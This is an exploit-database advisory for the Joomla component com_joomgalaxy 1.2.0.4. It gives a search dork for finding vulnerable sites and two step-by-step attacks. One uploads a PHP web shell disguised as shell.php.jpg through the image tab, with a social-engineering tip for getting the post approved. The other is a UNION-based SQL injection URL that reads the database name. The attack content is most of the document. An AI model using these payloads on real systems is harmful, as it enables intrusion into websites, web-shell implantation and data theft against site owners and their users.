Joomla! Component com_joomgalaxy 1.2.0.4 - Multiple Vulnerabilities



EKU-ID: 25763 CVE: OSVDB-84446;OSVDB-84445 OSVDB-ID:
Author: D4NB4R Published: 2012-08-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


_______________________________________________________________________________________

 Exploit Title: Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilites

 dork: inurl:com_joomgalaxy

 Date: [01-08-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 site: http://poisonsecurity.wordpress.com/

 Vendor: http://www.joomgalaxy.com/

 Version: 1.2.0.4 (last update on Jul 27, 2012)

 License: Commercial $ 149 us

 Demo: http://joomgalaxy.com/demo/

 Tested on: [Linux(bt5)-Windows(7ultimate)]


Joomgalaxy is a rich, comprehensive directory component brimming with unique features like Entry comparison, Pay per download, Tagging, Email Cloaking, Review and Rating with Multiple Attributes, add Articles to Entries, with many more plus all standard directory features as well.



1. Unrestricted File Upload



     1a. Go to this route, Complete the form and login the site
         Ingrese a esta ruta, Complete el formulario e ingrese al sitio

                http://site/index.php?option=com_users&view=registration


     1b. go to the following link and create a new post (sometimes it ask for confirmation of an administrator)
         so then create the post with something of social engineering and wait for a confirmation, if not forget this step

         vaya a este enlace cree un nuevo anuncio "Algunas veces pide confirmacion de administrador"
         asi que cree el anuncio con algo de ingenieria social y espere que confirmen si no omita este paso

               http://site/index.php?option=com_joomgalaxy&view=addentry


     1c.  once the post is published go to the tab images and upload your shell in the following way: shell.php.jpg
          Una vez resgistrado el anuncio dirijase a la pesta馻 imagenes y suba su shell de la siguiente forma
          shell.php.jpg


     1d.  Find your shell in the path
          Busque su shell en este path

           http://site/administrator/components/com_joomgalaxy/assets/images/Image_gallery/randomid_shell.php.jpg


2. Sql Injection


    p0c:

           http://site/index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,database(),3,4,5,6,7,8,9,10,11,12,13)



    Gretz : devboot, P1l0tcast, ksha, dedalo, etc..


Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"  2012